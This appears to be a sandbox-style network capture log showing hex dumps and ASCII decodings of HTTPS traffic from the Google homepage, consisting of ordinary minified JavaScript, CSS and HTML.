28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 61 2e 73 70 6c 69 74 28 22 22 29
                                                                                                                                                                      Data Ascii: uce.call(a,b,c)}:function(a,b,c){var d=c;(0,_.Ta)(a,function(e,f){d=b.call(void 0,d,e,f,a)});return d};_.Xa=Array.prototype.some?function(a,b){return Array.prototype.some.call(a,b,void 0)}:function(a,b){for(var c=a.length,d="string"===typeof a?a.split("")
                                                                                                                                                                      2021-09-14 14:03:24 UTC45INData Raw: 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 67 62 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 5f 2e 67 62 3f 61 2e 6a 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 53 61 66 65 55 72 6c 22 7d 3b 0a 69 62 3d 52 65 67 45 78 70 28 27 5e 28 3f 3a 61 75 64 69 6f 2f 28 3f 3a 33 67 70 70 32 7c 33 67 70 70 7c 61 61 63 7c 4c 31 36 7c 6d 69 64 69 7c 6d 70 33 7c 6d 70 34 7c 6d 70 65 67 7c 6f 67 61 7c 6f 67 67 7c 6f 70 75 73 7c 78 2d 6d 34 61 7c 78 2d 6d 61 74 72 6f 73 6b 61 7c 78 2d 77 61 76 7c 77 61 76 7c 77 65 62 6d 29 7c 66 6f 6e 74 2f 5c 5c 77 2b 7c 69 6d 61 67 65 2f 28 3f 3a 62 6d 70 7c 67 69 66 7c 6a 70 65 67 7c 6a 70 67 7c 70 6e 67 7c 74 69 66 66 7c 77 65 62 70 7c 78 2d 69 63 6f 6e 29 7c 76 69 64 65 6f 2f 28 3f 3a 6d 70 65 67 7c 6d 70 34 7c 6f 67 67 7c 77 65 62 6d
                                                                                                                                                                      Data Ascii: nstanceof _.gb&&a.constructor===_.gb?a.j:"type_error:SafeUrl"};ib=RegExp('^(?:audio/(?:3gpp2|3gpp|aac|L16|midi|mp3|mp4|mpeg|oga|ogg|opus|x-m4a|x-matroska|x-wav|wav|webm)|font/\\w+|image/(?:bmp|gif|jpeg|jpg|png|tiff|webp|x-icon)|video/(?:mpeg|mp4|ogg|webm
                                                                                                                                                                      2021-09-14 14:03:24 UTC46INData Raw: 74 7c 72 67 62 7c 72 67 62 61 7c 28 72 6f 74 61 74 65 7c 73 63 61 6c 65 7c 74 72 61 6e 73 6c 61 74 65 29 28 58 7c 59 7c 5a 7c 33 64 29 3f 7c 76 61 72 29 5c 5c 28 5b 2d 2b 2a 2f 30 2d 39 61 2d 7a 2e 25 5c 5c 5b 5c 5c 5d 2c 20 5d 2b 5c 5c 29 22 2c 22 67 22 29 3b 0a 61 3a 7b 76 61 72 20 77 62 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 69 66 28 77 62 29 7b 76 61 72 20 78 62 3d 77 62 2e 75 73 65 72 41 67 65 6e 74 3b 69 66 28 78 62 29 7b 5f 2e 76 62 3d 78 62 3b 62 72 65 61 6b 20 61 7d 7d 5f 2e 76 62 3d 22 22 7d 5f 2e 41 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2d 31 21 3d 5f 2e 76 62 2e 69 6e 64 65 78 4f 66 28 61 29 7d 3b 0a 76 61 72 20 41 62 3b 5f 2e 79 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 28 22 54 72 69 64 65
                                                                                                                                                                      Data Ascii: t|rgb|rgba|(rotate|scale|translate)(X|Y|Z|3d)?|var)\\([-+*/0-9a-z.%\\[\\], ]+\\)","g");a:{var wb=_.t.navigator;if(wb){var xb=wb.userAgent;if(xb){_.vb=xb;break a}}_.vb=""}_.A=function(a){return-1!=_.vb.indexOf(a)};var Ab;_.yb=function(){return _.A("Tride
                                                                                                                                                                      2021-09-14 14:03:24 UTC48INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 3b 62 3d 61 2e 66 69 72 73 74 43 68 69 6c 64 2e 66 69 72 73 74 43 68 69 6c 64 3b 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 5f 2e 46 62 28 5f 2e 48 62 29 3b 72 65 74 75 72 6e 21 62 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 7d 29 3b 5f 2e 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 4b 62 28 27 73 74 79 6c 65 5b 6e 6f 6e 63 65 5d 2c 6c 69 6e 6b 5b 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 5d 5b 6e 6f 6e 63 65 5d 27 2c 61 29 7d 3b 4d 62 3d 2f 5e 5b 5c 77 2b 2f 5f 2d 5d 2b 5b 3d 5d 7b 30 2c 32 7d 24 2f 3b 0a 5f 2e 4b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 28 62 7c 7c 5f 2e 74 29 2e 64 6f 63 75
                                                                                                                                                                      Data Ascii: ent.createElement("div"));a.appendChild(b);b=a.firstChild.firstChild;a.innerHTML=_.Fb(_.Hb);return!b.parentElement});_.Lb=function(a){return _.Kb('style[nonce],link[rel="stylesheet"][nonce]',a)};Mb=/^[\w+/_-]+[=]{0,2}$/;_.Kb=function(a,b){b=(b||_.t).docu
                                                                                                                                                                      Data Ascii: gin:0}.gb_cd .gb_3c{background:#4d90fe;border:2px solid transparent;box-sizing:border-box;font-weight:500;margin-top:21px;min-width:70px;text-align:center}.gb_cd a.gb_3{background:#1a73e8;border-radius:4px;color:#ffffff;font-family:Google Sans,Roboto,Robo
                                                                                                                                                                      2021-09-14 14:03:24 UTC82INData Raw: 68 3a 34 38 70 78 7d 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 33 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 33 32 36 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 79 64 20 2e 67 62 5f 70 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 35 34 70 78 3b 77 69 64 74 68 3a 32 35 34 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 77 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 67 62 5f 42 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64
                                                                                                                                                                      Data Ascii: h:48px}.gb_pd{padding-left:13px;width:100%}.gb_cd .gb_pd{padding-top:4px;min-width:326px;padding-left:0px;width:326px}.gb_cd.gb_yd .gb_pd{min-width:254px;width:254px}.gb_cd.gb_wd .gb_pd{padding-top:32px}.gb_Bd{color:#ffffff;font-size:13px;font-weight:bold
                                                                                                                                                                      2021-09-14 14:03:24 UTC83INData Raw: 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73
                                                                                                                                                                      Data Ascii: r-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));background-image:-ms-linear-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));border:1px solid rgba(0,0,0,0.2);box-shadow:0 1px 1px rgba(0,0,0,0.1);filter:progid:DXImageTransform.Microsoft.gradient(startColors
                                                                                                                                                                      2021-09-14 14:03:24 UTC85INData Raw: 34 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 30 70 78 7d 2e 71 61 72 73 74 62 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 33 65 55 67 62 22 20 64 61 74 61 2d 68 76 65 69 64 3d 22 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 6e 31 78 4a 63 66 20 4e 65 36 6e 53 64 22 3e 3c 73 74 79 6c 65 3e 2e 4e 65 36 6e 53 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 36 70 78 7d 61 2e 4d 56 33 54 6e 62 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 61 2e 4d 56 33 54 6e 62 3a 66 69 72 73 74
                                                                                                                                                                      Data Ascii: 4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}a.MV3Tnb{display:inline-block;padding:5px;margin:0 5px;color:#222}a.MV3Tnb:first
                                                                                                                                                                      2021-09-14 14:03:24 UTC86INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 53 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 4e 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 42 20 67 62 5f 62 64 20 67 62 5f 68 20 67 62 5f 41 66 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 3d 22 74 72 75 65 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 3d 22 22 20 69 64 3d 22 67 62 77 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 7a 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 5f 43 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 6f 67 6c 65 20 61 70 70 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 22 20 61 72 69 61 2d 65 78 70 61 6e
                                                                                                                                                                      Data Ascii: div></div><div class="gb_Se"><div class="gb_Nc"><div class="gb_B gb_bd gb_h gb_Af" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_zf"><a class="gb_C" aria-label="Google apps" href="https://www.google.co.uk/intl/en/about/products" aria-expan
                                                                                                                                                                      2021-09-14 14:03:24 UTC87INData Raw: 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6b 31 7a 49 41 20 72 53 6b 34 73 65 22 3e 3c 73 74 79 6c 65 3e 2e 72 53 6b 34 73 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 39 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 6e 58 64 70 64 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 6e 74 61 69 6e 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 77 69 64 74 68 3a 61 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 6e 58 64 70 64 22 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61
                                                                                                                                                                      Data Ascii: uto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/bra
                                                                                                                                                                      2021-09-14 14:03:24 UTC89INData Raw: 6d 63 61 76 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 32 34 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 36 70 78 7d 2e 52 4e 4e 58 67 62 3a
                                                                                                                                                                      Data Ascii: mcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:
                                                                                                                                                                      2021-09-14 14:03:24 UTC90INData Raw: 73 74 79 6c 65 3e 2e 67 4c 46 79 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 37 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 30 30 25 3b 2d 6d 73 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 37 70 78 3b 68 65 69 67 68 74 3a 33 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 6d 69 6e 69 64 69 76 20 2e 67 4c 46 79 66 7b 6d 61 72 67 69 6e
                                                                                                                                                                      Data Ascii: style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;-ms-tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin
                                                                                                                                                                      2021-09-14 14:03:24 UTC91INData Raw: 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 2e 4d 32 76 56 33 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 45 78 43 4b 6b 66 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 6d 69 6e 69 64 69 76 20 2e 42 4b 52 50 65 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 45 78 43 4b 6b 66 7b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65
                                                                                                                                                                      Data Ascii: r;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style
                                                                                                                                                                      2021-09-14 14:03:24 UTC92INData Raw: 31 36 70 78 7d 2e 65 72 6b 76 51 65 7b 66 6c 65 78 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 7d 2e 52 6a 50 75 56 62 7b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 36 70 78 20 30 20 30 7d 2e 53 33 6e 46 6e 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 53 33 6e 46 6e 64 20 2e 52 6a 50 75 56 62 2c 2e 53 33 6e 46 6e 64 20 2e 61 61 6a 5a 43 62 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 6c 68 38 37 6b 65 3a 6c 69 6e 6b 2c 2e 6c 68 38 37 6b 65 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 31 61 30 64 61 62 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 3a 31 31 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                                                                                                                                                                      Data Ascii: 16px}.erkvQe{flex:auto;padding-bottom:8px;}.RjPuVb{height:1px;margin:0 26px 0 0}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-to
                                                                                                                                                                      2021-09-14 14:03:24 UTC94INData Raw: 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 20 30 20 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 20 38 70 78 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 79 6e 52 72 69 63 22 20 69 64 3d 22 79 6e 52 72 69 63 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 2f 6c 69 3e 3c 73 74 79 6c 65 3e 23 59 4d 58 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 62 63 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                                                                                                      Data Ascii: family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><li class="ynRric" id="ynRric" role="presentation"></li><style>#YMXe{display:none}.sbct{display:flex;align-it
                                                                                                                                                                      2021-09-14 14:03:24 UTC95INData Raw: 67 2d 74 6f 70 3a 30 7d 2e 6d 75 73 5f 69 6c 5f 61 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 6c 5f 73 74 7b 72 69 67 68 74 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6d 75 73 5f 69 6c 5f 69 7b 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 74 33 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 2e 6d 75 73 5f 69 74 35 7b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67
                                                                                                                                                                      Data Ascii: g-top:0}.mus_il_at{margin-left:10px}.mus_il_st{right:52px;position:absolute}.mus_il_i{align:left;margin-right:10px}.mus_it3{margin-bottom:3px;max-height:24px;vertical-align:bottom}.mus_it5{height:24px;width:24px;vertical-align:bottom;margin-left:10px;marg
                                                                                                                                                                      2021-09-14 14:03:24 UTC96INData Raw: 70 6f 69 6e 74 65 72 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 32 38 35 66 34 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 20 3c 63 65 6e 74 65 72 3e 20 3c 69 6e 70
                                                                                                                                                                      Data Ascii: pointer;user-select:none}.lJ9FBc input[type="submit"]:hover{box-shadow:0 1px 1px rgba(0,0,0,.1);background-color:#f8f9fa;border:1px solid #dadce0;color:#202124}.lJ9FBc input[type="submit"]:focus{border:1px solid #4285f4;outline:none}</style> <center> <inp
                                                                                                                                                                      2021-09-14 14:03:24 UTC97INData Raw: 65 72 3d 22 45 6b 65 76 58 62 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 6a 73 61 63 74 69 6f 6e 3d 22 72 63 75 51 36 62 3a 6e 70 54 32 6d 64 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 64 75 66 33 2d 34 36 22 20 64 61 74 61 2d 6a 69 69 73 3d 22 75 70 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 74 79 70 65 3d 22 64 75 66 66 79 33 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 63 6f 6e 74 65 78 74 2d 72 65 71 75 69 72 65 64 3d 22 74 79 70 65 2c 6f 70 65 6e 2c 66 65 61 74 75 72 65 5f 69 64 2c 61 73 79 6e 63 5f 69 64 2c 65 6e 74 72 79 5f 70 6f 69 6e 74 2c 61 75 74 68 6f 72 69 74 79 2c 63 61 72 64 5f 69 64 2c 66 74 6f 65 2c 74 69 74 6c 65 2c 68 65 61 64 65 72 2c 73 75 67 67 65 73 74 69 6f 6e 73 2c 73 75 72 66 61 63 65 2c 73 75 67 67 65 73
                                                                                                                                                                      Data Ascii: er="EkevXb" style="display:none" jsaction="rcuQ6b:npT2md"></div><div id="duf3-46" data-jiis="up" data-async-type="duffy3" data-async-context-required="type,open,feature_id,async_id,entry_point,authority,card_id,ftoe,title,header,suggestions,surface,sugges
                                                                                                                                                                      2021-09-14 14:03:24 UTC99INData Raw: 6d 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 71 61 72 73 74 62 22 3e 3c 73 74 79 6c 65 3e 2e 76 63 56 5a 37 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 63 39 33 47 62 65 22 3e 3c 73 74 79 6c 65 3e 2e 63 39 33 47 62 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 32 66 32 66 32 7d 2e 75 55 37 64 4a 62 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 7d 2e 53 53 77 6a 49 65 7b 70 61 64 64 69 6e 67 3a 30 20 32
                                                                                                                                                                      Data Ascii: m></div><div class="o3j99 qarstb"><style>.vcVZ7d{text-align:center}</style></div><div class="o3j99 c93Gbe"><style>.c93Gbe{background:#f2f2f2}.uU7dJb{padding:15px 30px;border-bottom:1px solid #dadce0;font-size:15px;color:rgba(0,0,0,.54)}.SSwjIe{padding:0 2
                                                                                                                                                                      2021-09-14 14:03:24 UTC100INData Raw: 4c 63 30 50 37 79 41 68 57 4e 33 4b 51 4b 48 52 6c 58 42 7a 73 51 6b 64 51 43 43 41 34 27 2c 27 27 2c 27 27 2c 65 76 65 6e 74 29 22 3e 41 64 76 65 72 74 69 73 69 6e 67 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 3f 73 75 62 69 64 3d 77 77 2d 77 77 2d 65 74 2d 67 2d 61 77 61 2d 61 2d 67 5f 68 70 62 66 6f 6f 74 31 5f 31 21 6f 32 26 61 6d 70 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 67 6f 6f 67 6c 65 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 67 6f 6f 67 6c 65 5f 68 70 62 66 6f 6f 74 65 72 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73
                                                                                                                                                                      Data Ascii: Lc0P7yAhWN3KQKHRlXBzsQkdQCCA4','','',event)">Advertising</a><a class="pHiOh" href="https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&amp;utm_source=google.com&amp;utm_medium=referral&amp;utm_campaign=google_hpbfooter&amp;fg=1" onmous
